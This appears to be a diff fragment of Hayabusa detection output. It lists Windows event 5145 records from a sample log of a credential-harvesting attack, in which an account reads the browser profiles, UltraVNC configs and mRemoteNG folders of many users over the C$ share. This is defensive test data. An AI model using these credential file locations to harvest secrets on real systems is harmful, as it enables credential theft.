+2021-12-12 20:53:15.893 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Roaming\Comodo\IceDragon\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:15.893 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Roaming\K-Meleon\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:15.909 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Roaming\Mozilla\icecat\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:15.914 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Roaming\Mozilla\Firefox\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:15.914 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:15.914 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:15.926 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Roaming\Comodo\IceDragon\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:15.926 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Roaming\K-Meleon\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:15.926 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Roaming\Mozilla\icecat\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:15.942 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: ProgramFiles(x86)\uvnc bvba\UltraVNC\ultravnc.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:15.942 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: PROGRAMFILES\uvnc bvba\UltraVNC\ultravnc.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:15.942 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: PROGRAMFILES\UltraVNC\ultravnc.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:15.958 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: ProgramFiles(x86)\UltraVNC\ultravnc.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:15.958 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Program Files (x86)\uvnc bvba\UltraVNC\ultravnc.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:15.958 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: PROGRAM FILES\uvnc bvba\UltraVNC\ultravnc.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:15.973 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: PROGRAM FILES\UltraVNC\ultravnc.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:15.973 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Program Files (x86)\UltraVNC\ultravnc.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:30.264 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Local\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:30.264 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Local\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:30.264 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Roaming\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:30.280 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Roaming\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:30.280 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Local\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:30.280 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Local\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:30.295 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Roaming\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:30.295 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Roaming\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:30.295 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Local\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:30.311 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Local\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:30.311 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Roaming\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:30.311 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Roaming\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:30.327 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Local\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:30.327 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Local\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:30.327 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Roaming\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:30.343 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Roaming\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:30.343 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Local\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:30.343 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Local\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:30.359 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Roaming\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:30.359 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Roaming\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:30.359 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Local\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:30.374 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Local\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:30.374 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Roaming\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:30.374 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Roaming\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:30.374 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Local\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:30.390 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Local\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:30.390 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Roaming\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:30.390 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Roaming\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:30.406 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:30.406 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:30.406 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:30.422 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:30.422 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:30.422 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:30.437 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:30.437 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:30.437 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:30.453 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:30.453 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:30.453 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:30.468 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:30.468 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
